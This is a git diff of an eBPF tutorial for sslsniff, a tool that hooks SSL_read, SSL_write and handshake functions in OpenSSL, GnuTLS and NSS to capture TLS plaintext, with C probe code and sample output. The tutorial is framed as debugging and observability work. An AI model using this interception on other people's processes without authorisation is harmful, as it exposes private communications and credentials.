separate `attach_` function for each library. -例如,在 `attach_openssl` 函数中,我们为 `SSL_write` 和 `SSL_read` 设置了 probe。如果用户还希望追踪握手的延迟 (`env.latency`) 和握手过程 (`env.handshake`),那么我们还会为 `SSL_do_handshake` 设置 probe。 +For instance, in the `attach_openssl` function, we set up probes for both `SSL_write` and `SSL_read`. If users also want to track handshake latency (`env.latency`) and the handshake process (`env.handshake`), we set up a probe for `SSL_do_handshake`. -在eBPF生态系统中,perf_buffer是一个用于从内核态传输数据到用户态的高效机制。这对于内核态eBPF程序来说是十分有用的,因为它们不能直接与用户态进行交互。使用perf_buffer,我们可以在内核态eBPF程序中收集数据,然后在用户态异步地读取这些数据。我们使用 `perf_buffer__poll` 函数来读取内核态上报的数据,如下所示: +In the eBPF ecosystem, `perf_buffer` is an efficient mechanism used to transfer data from kernel space to user space. This is particularly useful for kernel-space eBPF programs as they can't directly interact with user space. With `perf_buffer`, we can collect data in kernel-space eBPF programs and then asynchronously read this data in user space. We use the `perf_buffer__poll` function to read data reported in kernel space, as shown below: ```c - while (!exiting) { - err = perf_buffer__poll(pb, PERF_POLL_TIMEOUT_MS); - if (err < 0 && err != -EINTR) { - warn("error polling perf buffer: %s\n", strerror(-err)); - goto cleanup; - } - err = 0; +while (!exiting) { + err = perf_buffer__poll(pb, PERF_POLL_TIMEOUT_MS); + if (err < 0 && err != -EINTR) { + warn("error polling perf buffer: %s\n", strerror(-err)); + goto cleanup; } + err = 0; +} ``` -最后,在 print_event 函数中,我们将数据打印到标准输出: +Finally, in the `print_event` function, we print the data to standard output: ```c // Function to print the event from the perf buffer @@ -426,37 +436,35 @@ void print_event(struct probe_SSL_data_t *event, const char *evt) { } ``` -完整的源代码可以在这里查看: +You can find the complete source code here: [https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/30-sslsniff](https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/30-sslsniff) -## 编译与运行 +## Compilation and Execution -关于如何安装依赖,请参考: - -要开始使用 `sslsniff`,首先要进行编译: +To start using `sslsniff`, you need to first compile it: ```sh make ``` -完成后,请按照以下步骤操作: +Once done, follow these steps: -### **启动 sslsniff** +### **Start sslsniff** -在一个终端中,执行以下命令来启动 `sslsniff`: +In a terminal, execute the following command to start `sslsniff`: ```sh sudo ./sslsniff ``` -### **执行 CURL 命令** +### **Execute CURL command** -在另一个终端中,执行: +In another terminal, execute: ```console curl https://example.com ``` -正常情况下,你会看到类似以下的输出: +Under normal circumstances, you will see output similar to the following: ```html @@ -472,9 +480,9 @@ curl https://example.com ``` -### **sslsniff 输出** +### **sslsniff Output** -当执行 `curl` 命令后,`sslsniff` 会显示以下内容: +After executing the `curl` command, `sslsniff` will display the following content: ```txt READ/RECV 0.132786160 curl 47458 1256 @@ -491,11 +499,11 @@ curl https://example.com ----- END DATA ----- ``` -**注意**:显示的 HTML 内容可能会因 `example.com` 页面的不同而有所不同。 +**Note**: The displayed HTML content may vary depending on the specific content of the `example.com` page. -### 显示延迟和握手过程 +### Displaying Latency and Handshake Process -要查看延迟和握手过程,请执行以下命令: +To view latency and handshake process, execute the following command: ```console $ sudo ./sslsniff -l --handshake @@ -506,9 +514,9 @@ FUNC TIME(s) COMM PID LEN LAT(ms) HANDSHAKE 0.000000000 curl 6460 1 1.384 WRITE/SEND 0.000115400 curl 6460 24 0.014 ``` -### 16进制输出 +### Hexadecimal Output -要以16进制格式显示数据,请执行以下命令: +To display data in hexadecimal format, execute the following command: ```console $ sudo ./sslsniff --hexdump @@ -521,14 +529,16 @@ WRITE/SEND 0.000000000 curl 16104 24 ... ``` -## 总结 +## Summary -eBPF 是一个非常强大的技术,它可以帮助我们深入了解系统的工作原理。本教程是一个简单的示例,展示了如何使用 eBPF 来监控 SSL/TLS 通信。如果您对 eBPF 技术感兴趣,并希望进一步了解和实践,可以访问我们的教程代码仓库 和教程网站 +eBPF is a very powerful technology that can help us gain deeper insights into how a system works. This tutorial is a simple example demonstrating how to use eBPF to monitor SSL/TLS communication. If you're interested in eBPF technology and want to learn more and practice further, you can visit our tutorial code repository at and tutorial website at . -参考资料: +References: - - - - - + +> The original link of this article: diff --git a/src/30-sslsniff/README.zh.md b/src/30-sslsniff/README.zh.md new file mode 100644 index 0000000..aea36bb --- /dev/null +++ b/src/30-sslsniff/README.zh.md @@ -0,0 +1,534 @@ +# eBPF 实践教程:使用 uprobe 捕获多种库的 SSL/TLS 明文数据 + +随着TLS在现代网络环境中的广泛应用,跟踪微服务RPC消息已经变得愈加棘手。传统的流量嗅探技术常常受限于只能获取到加密后的数据,导致无法真正观察到通信的原始内容。这种限制为系统的调试和分析带来了不小的障碍。 + +但现在,我们有了新的解决方案。使用 eBPF 技术,通过其能力在用户空间进行探测,提供了一种方法重新获得明文数据,使得我们可以直观地查看加密前的通信内容。然而,每个应用可能使用不同的库,每个库都有多个版本,这种多样性给跟踪带来了复杂性。 + +在本教程中,我们将带您了解一种跨多种用户态 SSL/TLS 库的 eBPF 追踪技术,它不仅可以同时跟踪 GnuTLS 和 OpenSSL 等用户态库,而且相比以往,大大降低了对新版本库的维护工作。完整的源代码可以在这里查看:。 + +## 背景知识 + +在深入本教程的主题之前,我们需要理解一些核心概念,这些概念将为我们后面的讨论提供基础。 + +### SSL 和 TLS + +SSL (Secure Sockets Layer): 由 Netscape 在 1990 年代早期开发,为网络上的两台机器之间提供数据加密传输。然而,由于某些已知的安全问题,SSL的使用已被其后继者TLS所替代。 + +TLS (Transport Layer Security): 是 SSL 的继任者,旨在提供更强大和更安全的数据加密方式。TLS 工作通过一个握手过程,在这个过程中,客户端和服务器之间会选择一个加密算法和相应的密钥。一旦握手完成,数据传输开始,所有数据都使用选择的算法和密钥加密。 + +### TLS 的工作原理 + +Transport Layer Security (TLS) 是一个密码学协议,旨在为计算机网络上的通信提供安全性。它主要目标是通过密码学,例如证书的使用,为两个或更多通信的计算机应用程序提供安全性,包括隐私(机密性)、完整性和真实性。TLS 由两个子层组成:TLS 记录协议和TLS 握手协议。 + +#### 握手过程 + +当客户端与启用了TLS的服务器连接并请求建立安全连接时,握手过程开始。握手允许客户端和服务器通过不对称密码来建立连接的安全性参数,完整流程如下: + +1. **初始握手**:客户端连接到启用了TLS的服务器,请求安全连接,并提供它支持的密码套件列表(加密算法和哈希函数)。 +2. **选择密码套件**:从提供的列表中,服务器选择它也支持的密码套件和哈希函数,并通知客户端已做出的决定。 +3. **提供数字证书**:通常,服务器接下来会提供形式为数字证书的身份验证。此证书包含服务器名称、信任的证书授权机构(为证书的真实性提供担保)以及服务器的公共加密密钥。 +4. **验证证书**:客户端在继续之前确认证书的有效性。 +5. **生成会话密钥**:为了生成用于安全连接的会话密钥,客户端有以下两种方法: + - 使用服务器的公钥加密一个随机数(PreMasterSecret)并将结果发送到服务器(只有服务器才能使用其私钥解密);双方然后使用该随机数生成一个独特的会话密钥,用于会话期间的数据加密和解密。 + - 使用 Diffie-Hellman 密钥交换(或其变体椭圆曲线DH)来安全地生成一个随机且独特的会话密钥,用于加密和解密,该密钥具有前向保密的额外属性:即使在未来公开了服务器的私钥,也不能用它来解密当前的会话,即使第三方拦截并记录了会话。 + +一旦上述步骤成功完成,握手过程便结束,加密的连接开始。此连接使用会话密钥进行加密和解密,直到连接关闭。如果上述任何步骤失败,则TLS握手失败,连接将不会建立。 + +#### OSI模型中的TLS + +TLS 和 SSL 不完全适合 OSI 模型或 TCP/IP 模型的任何单一层次。TLS 在“某些可靠的传输协议(例如,TCP)之上运行”,这意味着它位于传输层之上。它为更高的层提供加密,这通常是表示层的功能。但是,使用TLS 的应用程序通常视其为传输层,即使使用TLS的应用程序必须积极控制启动 TLS 握手和交换的认证证书的处理。 + +### eBPF 和 uprobe + +eBPF (Extended Berkeley Packet Filter): 是一种内核技术,允许用户在内核空间中运行预定义的程序,不需要修改内核源代码或重新加载模块。它创建了一个桥梁,使得用户空间和内核空间可以交互,从而为系统监控、性能分析和网络流量分析等任务提供了无前例的能力。 + +uprobes 是eBPF的一个重要特性,允许我们在用户空间应用程序中动态地插入探测点,特别适用于跟踪SSL/TLS库中的函数调用。Uprobe 在内核态 eBPF 运行时,也可能产生比较大的性能开销,这时候也可以考虑使用用户态 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。bpftime 是一个基于 LLVM JIT/AOT 的用户态 eBPF 运行时,它可以在用户态运行 eBPF 程序,和内核态的 eBPF 兼容,避免了内核态和用户态之间的上下文切换,从而提高了 eBPF 程序的执行效率。对于 uprobe 而言,bpftime 的性能开销比 kernel 小一个数量级。 + +### 用户态库 + +SSL/TLS协议的实现主要依赖于用户态库。以下是一些常见的库: + +- OpenSSL: 一个开源的、功能齐全的加密库,广泛应用于许多开源和商业项目中。 +- BoringSSL: 是Google维护的OpenSSL的一个分支,重点是简化和优化,适用于Google的需求。 +- GnuTLS: 是GNU项目的一部分,提供了SSL,TLS和DTLS协议的实现。与OpenSSL和BoringSSL相比,GnuTLS在API设计、模块结构和许可证上有所不同。 + +## OpenSSL API 分析 + +OpenSSL 是一个广泛应用的开源库,提供了 SSL 和 TLS 协议的完整实现,并广泛用于各种应用程序中以确保数据传输的安全性。其中,SSL_read() 和 SSL_write() 是两个核心的 API 函数,用于从 TLS/SSL 连接中读取和写入数据。本章节,我们将深入这两个函数,帮助你理解其工作机制。 + +### 1. SSL_read 函数 + +当我们想从一个已建立的 SSL 连接中读取数据时,可以使用 `SSL_read` 或 `SSL_read_ex` 函数。函数原型如下: + +```c +int SSL_read_ex(SSL *ssl, void *buf, size_t num, size_t *readbytes); +int SSL_read(SSL *ssl, void *buf, int num); +``` + +`SSL_read` 和 `SSL_read_ex` 试图从指定的 `ssl` 中读取最多 `num` 字节的数据到缓冲区 `buf` 中。成功时,`SSL_read_ex` 会在 `*readbytes` 中存储实际读取到的字节数。 + +### 2. SSL_write 函数 + +当我们想往一个已建立的 SSL 连接中写入数据时,可以使用 `SSL_write` 或 `SSL_write_ex` 函数。 + +函数原型: + +```c +int SSL_write_ex(SSL *s, const void *buf, size_t num, size_t *written); +int SSL_write(SSL *ssl, const void *buf, int num); +``` + +`SSL_write` 和 `SSL_write_ex` 会从缓冲区 `buf` 中将最多 `num` 字节的数据写入到指定的 `ssl` 连接中。成功时,`SSL_write_ex` 会在 `*written` 中存储实际写入的字节数。 + +## eBPF 内核态代码编写 + +在我们的例子中,我们使用 eBPF 来 hook ssl_read 和 ssl_write 函数,从而在数据读取或写入 SSL 连接时执行自定义操作。 + +### 数据结构 + +首先,我们定义了一个数据结构 probe_SSL_data_t 用于在内核态和用户态之间传输数据: + +```c +#define MAX_BUF_SIZE 8192 +#define TASK_COMM_LEN 16 + +struct probe_SSL_data_t { + __u64 timestamp_ns; // 时间戳(纳秒) + __u64 delta_ns; // 函数执行时间 + __u32 pid; // 进程 ID + __u32 tid; // 线程 ID + __u32 uid; // 用户 ID + __u32 len; // 读/写数据的长度 + int buf_filled; // 缓冲区是否填充完整 + int rw; // 读或写(0为读,1为写) + char comm[TASK_COMM_LEN]; // 进程名 + __u8 buf[MAX_BUF_SIZE]; // 数据缓冲区 + int is_handshake; // 是否是握手数据 +}; +``` + +### Hook 函数 + +我们的目标是 hook 到 `SSL_read` 和 `SSL_write` 函数。我们定义了一个函数 `SSL_exit` 来处理这两个函数的返回值。该函数会根据当前进程和线程的 ID,确定是否需要追踪并收集数据。 + +```c +static int SSL_exit(struct pt_regs *ctx, int rw) { + int ret = 0; + u32 zero = 0; + u64 pid_tgid = bpf_get_current_pid_tgid(); + u32 pid = pid_tgid >> 32; + u32 tid = (u32)pid_tgid; + u32 uid = bpf_get_current_uid_gid(); + u64 ts = bpf_ktime_get_ns(); + + if (!trace_allowed(uid, pid)) { + return 0; + } + + /* store arg info for later lookup */ + u64 *bufp = bpf_map_lookup_elem(&bufs, &tid); + if (bufp == 0) + return 0; + + u64 *tsp = bpf_map_lookup_elem(&start_ns, &tid); + if (!tsp) + return 0; + u64 delta_ns = ts - *tsp; + + int len = PT_REGS_RC(ctx); + if (len <= 0) // no data + return 0; + + struct probe_SSL_data_t *data = bpf_map_lookup_elem(&ssl_data, &zero); + if (!data) + return 0; + + data->timestamp_ns = ts; + data->delta_ns = delta_ns; + data->pid = pid; + data->tid = tid; + data->uid = uid; + data->len = (u32)len; + data->buf_filled = 0; + data->rw = rw; + data->is_handshake = false; + u32 buf_copy_size = min((size_t)MAX_BUF_SIZE, (size_t)len); + + bpf_get_current_comm(&data->comm, sizeof(data->comm)); + + if (bufp != 0) + ret = bpf_probe_read_user(&data->buf, buf_copy_size, (char *)*bufp); + + bpf_map_delete_elem(&bufs, &tid); + bpf_map_delete_elem(&start_ns, &tid); + + if (!ret) + data->buf_filled = 1; + else + buf_copy_size = 0; + + bpf_perf_event_output(ctx, &perf_SSL_events, BPF_F_CURRENT_CPU, data, + EVENT_SIZE(buf_copy_size)); + return 0; +} +``` + +这里的 `rw` 参数标识是读还是写。0 代表读,1 代表写。 + +#### 数据收集流程 + +1. 获取当前进程和线程的 ID,以及当前用户的 ID。 +2. 通过 `trace_allowed` 判断是否允许追踪该进程。 +3. 获取起始时间,以计算函数的执行时间。 +4. 尝试从 `bufs` 和 `start_ns` maps 中查找相关的数据。 +5. 如果成功读取了数据,则创建或查找 `probe_SSL_data_t` 结构来填充数据。 +6. 将数据从用户空间复制到缓冲区,并确保不超过预定的大小。 +7. 最后,将数据发送到用户空间。 + +注意:我们使用了两个用户返回探针 `uretprobe` 来分别 hook `SSL_read` 和 `SSL_write` 的返回: + +```c +SEC("uretprobe/SSL_read") +int BPF_URETPROBE(probe_SSL_read_exit) { + return (SSL_exit(ctx, 0)); // 0 表示读操作 +} + +SEC("uretprobe/SSL_write") +int BPF_URETPROBE(probe_SSL_write_exit) { + return (SSL_exit(ctx, 1)); // 1 表示写操作 +} +``` + +### Hook到握手过程 + +在 SSL/TLS 中,握手(handshake)是一个特殊的过程,用于在客户端和服务器之间建立安全的连接。为了分析此过程,我们 hook 到了 `do_handshake` 函数,以跟踪握手的开始和结束。 + +#### 进入握手 + +我们使用 `uprobe` 为 `do_handshake` 设置一个 probe: + +```c + +SEC("uprobe/do_handshake") +int BPF_UPROBE(probe_SSL_do_handshake_enter, void *ssl) { + u64 pid_tgid = bpf_get_current_pid_tgid(); + u32 pid = pid_tgid >> 32; + u32 tid = (u32)pid_tgid; + u64 ts = bpf_ktime_get_ns(); + u32 uid = bpf_get_current_uid_gid(); + + if (!trace_allowed(uid, pid)) { + return 0; + } + + /* store arg info for later lookup */ + bpf_map_update_elem(&start_ns, &tid, &ts, BPF_ANY); + return 0; +} +``` + +这段代码的主要功能如下: + +1. 获取当前的 `pid`, `tid`, `ts` 和 `uid`。 +2. 使用 `trace_allowed` 检查进程是否被允许追踪。 +3. 将当前时间戳存储在 `start_ns` 映射中,用于稍后计算握手过程的持续时间。 + +#### 退出握手 + +同样,我们为 `do_handshake` 的返回设置了一个 `uretprobe`: + +```c + +SEC("uretprobe/do_handshake") +int BPF_URETPROBE(probe_SSL_do_handshake_exit) { + u32 zero = 0; + u64 pid_tgid = bpf_get_current_pid_tgid(); + u32 pid = pid_tgid >> 32; + u32 tid = (u32)pid_tgid; + u32 uid = bpf_get_current_uid_gid(); + u64 ts = bpf_ktime_get_ns(); + int ret = 0; + + /* use kernel terminology here for tgid/pid: */ + u32 tgid = pid_tgid >> 32; + + /* store arg info for later lookup */ + if (!trace_allowed(tgid, pid)) { + return 0; + } + + u64 *tsp = bpf_map_lookup_elem(&start_ns, &tid); + if (tsp == 0) + return 0; + + ret = PT_REGS_RC(ctx); + if (ret <= 0) // handshake failed + return 0; + + struct probe_SSL_data_t *data = bpf_map_lookup_elem(&ssl_data, &zero); + if (!data) + return 0; + + data->timestamp_ns = ts; + data->delta_ns = ts - *tsp; + data->pid = pid; + data->tid = tid; + data->uid = uid; + data->len = ret; + data->buf_filled = 0; + data->rw = 2; + data->is_handshake = true; + bpf_get_current_comm(&data->comm, sizeof(data->comm)); + bpf_map_delete_elem(&start_ns, &tid); + + bpf_perf_event_output(ctx, &perf_SSL_events, BPF_F_CURRENT_CPU, data, + EVENT_SIZE(0)); + return 0; +} +``` + +此函数的逻辑如下: + +1. 获取当前的 `pid`, `tid`, `ts` 和 `uid`。 +2. 使用 `trace_allowed` 再次检查是否允许追踪。 +3. 查找 `start_ns` 映射中的时间戳,用于计算握手的持续时间。 +4. 使用 `PT_REGS_RC(ctx)` 获取 `do_handshake` 的返回值,判断握手是否成功。 +5. 查找或初始化与当前线程关联的 `probe_SSL_data_t` 数据结构。 +6. 更新数据结构的字段,包括时间戳、持续时间、进程信息等。 +7. 通过 `bpf_perf_event_output` 将数据发送到用户态。 + +我们的 eBPF 代码不仅跟踪了 `ssl_read` 和 `ssl_write` 的数据传输,还特别关注了 SSL/TLS 的握手过程。这些信息对于深入了解和优化安全连接的性能至关重要。 + +通过这些 hook 函数,我们可以获得关于握手成功与否、握手所需的时间以及相关的进程信息的数据。这为我们提供了关于系统 SSL/TLS 行为的深入见解,可以帮助我们在需要时进行更深入的分析和优化。 + +## 用户态辅助代码分析与解读 + +在 eBPF 的生态系统中,用户态和内核态代码经常协同工作。内核态代码负责数据的采集,而用户态代码则负责设置、管理和处理这些数据。在本节中,我们将解读上述用户态代码如何配合 eBPF 追踪 SSL/TLS 交互。 + +### 1. 支持的库挂载 + +上述代码片段中,根据环境变量 `env` 的设定,程序可以选择针对三种常见的加密库(OpenSSL、GnuTLS 和 NSS)进行挂载。这意味着我们可以在同一个工具中对多种库的调用进行追踪。 + +为了实现这一功能,首先利用 `find_library_path` 函数确定库的路径。然后,根据库的类型,调用对应的 `attach_` 函数来将 eBPF 程序挂载到库函数上。 + +```c + if (env.openssl) { + char *openssl_path = find_library_path("libssl.so"); + printf("OpenSSL path: %s\n", openssl_path); + attach_openssl(obj, openssl_path); + } + if (env.gnutls) { + char *gnutls_path = find_library_path("libgnutls.so"); + printf("GnuTLS path: %s\n", gnutls_path); + attach_gnutls(obj, gnutls_path); + } + if (env.nss) { + char *nss_path = find_library_path("libnspr4.so"); + printf("NSS path: %s\n", nss_path); + attach_nss(obj, nss_path); + } +``` + +这里主要包含 OpenSSL、GnuTLS 和 NSS 三个库的挂载逻辑。NSS 是为组织设计的一套安全库,支持创建安全的客户端和服务器应用程序。它们最初是由 Netscape 开发的,现在由 Mozilla 维护。其他两个库前面已经介绍过了,这里不再赘述。 + +### 2. 详细挂载逻辑 + +具体的 attach 函数如下: + +```c +#define __ATTACH_UPROBE(skel, binary_path, sym_name, prog_name, is_retprobe) \ + do { \ + LIBBPF_OPTS(bpf_uprobe_opts, uprobe_opts, .func_name = #sym_name, \ + .retprobe = is_retprobe); \ + skel->links.prog_name = bpf_program__attach_uprobe_opts( \ + skel->progs.prog_name, env.pid, binary_path, 0, &uprobe_opts); \ + } while (false) + +int attach_openssl(struct sslsniff_bpf *skel, const char *lib) { + ATTACH_UPROBE_CHECKED(skel, lib, SSL_write, probe_SSL_rw_enter); + ATTACH_URETPROBE_CHECKED(skel, lib, SSL_write, probe_SSL_write_exit); + ATTACH_UPROBE_CHECKED(skel, lib, SSL_read, probe_SSL_rw_enter); + ATTACH_URETPROBE_CHECKED(skel, lib, SSL_read, probe_SSL_read_exit); + + if (env.latency && env.handshake) { + ATTACH_UPROBE_CHECKED(skel, lib, SSL_do_handshake, + probe_SSL_do_handshake_enter); + ATTACH_URETPROBE_CHECKED(skel, lib, SSL_do_handshake, + probe_SSL_do_handshake_exit); + } + + return 0; +} + +int attach_gnutls(struct sslsniff_bpf *skel, const char *lib) { + ATTACH_UPROBE_CHECKED(skel, lib, gnutls_record_send, probe_SSL_rw_enter); + ATTACH_URETPROBE_CHECKED(skel, lib, gnutls_record_send, probe_SSL_write_exit); + ATTACH_UPROBE_CHECKED(skel, lib, gnutls_record_recv, probe_SSL_rw_enter); + ATTACH_URETPROBE_CHECKED(skel, lib, gnutls_record_recv, probe_SSL_read_exit); + + return 0; +} + +int attach_nss(struct sslsniff_bpf *skel, const char *lib) { + ATTACH_UPROBE_CHECKED(skel, lib, PR_Write, probe_SSL_rw_enter); + ATTACH_URETPROBE_CHECKED(skel, lib, PR_Write, probe_SSL_write_exit); + ATTACH_UPROBE_CHECKED(skel, lib, PR_Send, probe_SSL_rw_enter); + ATTACH_URETPROBE_CHECKED(skel, lib, PR_Send, probe_SSL_write_exit); + ATTACH_UPROBE_CHECKED(skel, lib, PR_Read, probe_SSL_rw_enter); + ATTACH_URETPROBE_CHECKED(skel, lib, PR_Read, probe_SSL_read_exit); + ATTACH_UPROBE_CHECKED(skel, lib, PR_Recv, probe_SSL_rw_enter); + ATTACH_URETPROBE_CHECKED(skel, lib, PR_Recv, probe_SSL_read_exit); + + return 0; +} +``` + +我们进一步观察 `attach_` 函数,可以看到它们都使用了 `ATTACH_UPROBE_CHECKED` 和 `ATTACH_URETPROBE_CHECKED` 宏来实现具体的挂载逻辑。这两个宏分别用于设置 uprobe(函数入口)和 uretprobe(函数返回)。 + +考虑到不同的库有不同的 API 函数名称(例如,OpenSSL 使用 `SSL_write`,而 GnuTLS 使用 `gnutls_record_send`),所以我们需要为每个库写一个独立的 `attach_` 函数。 + +例如,在 `attach_openssl` 函数中,我们为 `SSL_write` 和 `SSL_read` 设置了 probe。如果用户还希望追踪握手的延迟 (`env.latency`) 和握手过程 (`env.handshake`),那么我们还会为 `SSL_do_handshake` 设置 probe。 + +在eBPF生态系统中,perf_buffer是一个用于从内核态传输数据到用户态的高效机制。这对于内核态eBPF程序来说是十分有用的,因为它们不能直接与用户态进行交互。使用perf_buffer,我们可以在内核态eBPF程序中收集数据,然后在用户态异步地读取这些数据。我们使用 `perf_buffer__poll` 函数来读取内核态上报的数据,如下所示: + +```c + while (!exiting) { + err = perf_buffer__poll(pb, PERF_POLL_TIMEOUT_MS); + if (err < 0 && err != -EINTR) { + warn("error polling perf buffer: %s\n", strerror(-err)); + goto cleanup; + } + err = 0; + } +``` + +最后,在 print_event 函数中,我们将数据打印到标准输出: + +```c +// Function to print the event from the perf buffer +void print_event(struct probe_SSL_data_t *event, const char *evt) { + ... + if (buf_size != 0) { + if (env.hexdump) { + // 2 characters for each byte + null terminator + char hex_data[MAX_BUF_SIZE * 2 + 1] = {0}; + buf_to_hex((uint8_t *)buf, buf_size, hex_data); + + printf("\n%s\n", s_mark); + for (size_t i = 0; i < strlen(hex_data); i += 32) { + printf("%.32s\n", hex_data + i); + } + printf("%s\n\n", e_mark); + } else { + printf("\n%s\n%s\n%s\n\n", s_mark, buf, e_mark); + } + } +} +``` + +完整的源代码可以在这里查看: + +## 编译与运行 + +关于如何安装依赖,请参考: + +要开始使用 `sslsniff`,首先要进行编译: + +```sh +make +``` + +完成后,请按照以下步骤操作: + +### **启动 sslsniff** + +在一个终端中,执行以下命令来启动 `sslsniff`: + +```sh +sudo ./sslsniff +``` + +### **执行 CURL 命令** + +在另一个终端中,执行: + +```console +curl https://example.com +``` + +正常情况下,你会看到类似以下的输出: + +```html + + + + Example Domain + ... + +
+ ... +
+ + +``` + +### **sslsniff 输出** + +当执行 `curl` 命令后,`sslsniff` 会显示以下内容: + +```txt + READ/RECV 0.132786160 curl 47458 1256 + ----- DATA ----- + + ... +
+

Example Domain

+ ... +
+ + + + ----- END DATA ----- +``` + +**注意**:显示的 HTML 内容可能会因 `example.com` 页面的不同而有所不同。 + +### 显示延迟和握手过程 + +要查看延迟和握手过程,请执行以下命令: + +```console +$ sudo ./sslsniff -l --handshake +OpenSSL path: /lib/x86_64-linux-gnu/libssl.so.3 +GnuTLS path: /lib/x86_64-linux-gnu/libgnutls.so.30 +NSS path: /lib/x86_64-linux-gnu/libnspr4.so +FUNC TIME(s) COMM PID LEN LAT(ms) +HANDSHAKE 0.000000000 curl 6460 1 1.384 WRITE/SEND 0.000115400 curl 6460 24 0.014 +``` + +### 16进制输出 + +要以16进制格式显示数据,请执行以下命令: + +```console +$ sudo ./sslsniff --hexdump +WRITE/SEND 0.000000000 curl 16104 24 +----- DATA ----- +505249202a20485454502f322e300d0a +0d0a534d0d0a0d0a +----- END DATA ----- + +... +``` + +## 总结 + +eBPF 是一个非常强大的技术,它可以帮助我们深入了解系统的工作原理。本教程是一个简单的示例,展示了如何使用 eBPF 来监控 SSL/TLS 通信。如果您对 eBPF 技术感兴趣,并希望进一步了解和实践,可以访问我们的教程代码仓库 和教程网站 + +参考资料: + +- +- +- +- +- diff --git a/src/30-sslsniff/README_en.md b/src/30-sslsniff/README_en.md deleted file mode 100644 index c1b8dcf..0000000 --- a/src/30-sslsniff/README_en.md +++ /dev/null @@ -1,544 +0,0 @@ -# eBPF Practical Tutorial: Capturing SSL/TLS Plain Text Data Using uprobe - -With the widespread use of TLS in modern network environments, tracing microservices RPC messages has become increasingly challenging. Traditional traffic sniffing techniques often face limitations in accessing only encrypted data, preventing a genuine observation of the original communication content. This restriction poses significant obstacles to system debugging and analysis. - -However, a new solution is now available. Through the use of eBPF technology and its capability to perform probing in user space, a method has emerged to regain plain text data, allowing us to intuitively view the pre-encrypted communication content. Nevertheless, each application might utilize different libraries, and each library comes in multiple versions, introducing complexity to the tracking process. - -In this tutorial, we will guide you through an eBPF tracing technique that spans across various user-space SSL/TLS libraries. This technique not only allows simultaneous tracing of user-space libraries like GnuTLS and OpenSSL but also significantly reduces maintenance efforts for new library versions compared to previous methods. The complete code for this tutorial can be found in <完整的源代码可以在这里查看: - -## Background Knowledge - -Before delving into the main topic of this tutorial, we need to grasp some core concepts that will serve as the foundation for our subsequent discussions. - -### SSL and TLS - -SSL (Secure Sockets Layer): Developed by Netscape in the early 1990s, SSL provides data encryption for communication between two machines on a network. However, due to known security vulnerabilities, SSL has been succeeded by its successor, TLS. - -TLS (Transport Layer Security): TLS is the successor to SSL, aiming to provide stronger and more secure data encryption methods. TLS operates through a handshake process during which a client and a server select an encryption algorithm and corresponding keys. Once the handshake is complete, data transmission begins, with all data being encrypted using the chosen algorithm and keys. - -### Operation Principles of TLS - -Transport Layer Security (TLS) is a cryptographic protocol designed to provide security for communication over computer networks. Its primary goal is to provide security, including privacy (confidentiality), integrity, and authenticity, for two or more communicating computer applications over a network using cryptography, such as certificates. TLS consists of two sub-layers: the TLS Record Protocol and the TLS Handshake Protocol. - -#### Handshake Process - -When a client connects to a TLS-enabled server and requests a secure connection, the handshake process begins. The handshake allows the client and server to establish security parameters for the connection using asymmetric cryptography. The complete process is as follows: - -1. **Initial Handshake**: The client connects to the TLS-enabled server, requests a secure connection, and provides a list of supported cipher suites (encryption algorithms and hash functions). -2. **Selecting Cipher Suite**: From the provided list, the server chooses a cipher suite and hash function it also supports and notifies the client of the decision. -3. **Providing Digital Certificate**: Usually, the server then provides identity authentication in the form of a digital certificate. This certificate includes the server's name, trusted certificate authorities (guaranteeing the certificate's authenticity), and the server's public encryption key. -4. **Certificate Verification**: The client verifies the certificate's validity before proceeding. -5. **Generating Session Key**: To create a session key for a secure connection, the client has two methods: - - Encrypt a random number (PreMasterSecret) with the server's public key and send the result to the server (only the server can decrypt it with its private key); both parties then use this random number to generate a unique session key for encrypting and decrypting data during the session. - - Use Diffie-Hellman key exchange (or its variant, Elliptic Curve DH) to securely generate a random and unique session key for encryption and decryption. This key has the additional property of forward secrecy: even if the server's private key is exposed in the future, it can't be used to decrypt the current session, even if a third party intercepts and records the session. - -Once these steps are successfully completed, the handshake process concludes, and the encrypted connection begins. This connection uses the session key for encryption and decryption until the connection is closed. If any of the above steps fail, the TLS handshake fails, and the connection won't be established. - -#### TLS in the OSI Model - -TLS and SSL don't perfectly align with any single layer of the OSI model or the TCP/IP model. TLS "runs over some reliable transport protocol (such as TCP)," which means it sits above the transport layer. It provides encryption for higher layers, typically the presentation layer. However, applications using TLS often consider it the transport layer, even though applications using TLS must actively control the initiation of TLS handshakes and the handling of exchanged authentication certificates. - -### eBPF and uprobes - -eBPF (Extended Berkeley Packet Filter): It's a kernel technology that allows users to run predefined programs in the kernel space without modifying kernel source code or reloading modules. It creates a bridge that enables interaction between user space and kernel space, providing unprecedented capabilities for tasks like system monitoring, performance analysis, and network traffic analysis. - -uprobes are a significant feature of eBPF, allowing dynamic insertion of probe points in user space applications, particularly useful for tracking function calls in SSL/TLS libraries. Uprobe in kernel mode eBPF runtime may also cause relatively large performance overhead. In this case, you can also consider using user mode eBPF runtime, such as [bpftime](https://github.com/eunomia-bpf/bpftime)。bpftime is a user mode eBPF runtime based on LLVM JIT/AOT. It can run eBPF programs in user mode and is compatible with kernel mode eBPF, avoiding context switching between kernel mode and user mode, thereby improving the execution efficiency of eBPF programs. bpftime can have a performance overhead that is one order of magnitude smaller than that of kernel mode eBPF. - -### User-Space Libraries - -The implementation of the SSL/TLS protocol heavily relies on user-space libraries. Here are some common ones: - -- OpenSSL: An open-source, feature-rich cryptographic library widely used in many open-source and commercial projects. -- BoringSSL: A fork of OpenSSL maintained by Google, focusing on simplification and optimization for Google's needs. -- GnuTLS: Part of the GNU project, offering an implementation of SSL, TLS, and DTLS protocols. GnuTLS differs from OpenSSL and BoringSSL in API design, module structure, and licensing. - -## OpenSSL API Analysis - -OpenSSL is a widely used open-source library providing a complete implementation of the SSL and TLS protocols, ensuring data transmission security in various applications. Among its functions, SSL_read() and SSL_write() are two core API functions for reading from and writing to TLS/SSL connections. In this section, we'll delve into these functions to help you understand their mechanisms. - -### 1. SSL_read Function - -When we want to read data from an established SSL connection, we can use the `SSL_read` or `SSL_read_ex` function. The function prototype is as follows: - -```c -int SSL_read_ex(SSL *ssl, void *buf, size_t num, size_t *readbytes); -int SSL_read(SSL *ssl, void *buf, int num); -``` - -`SSL_read` and `SSL_read_ex` attempt to read up to `num` bytes of data from the specified `ssl` into the buffer `buf`. Upon 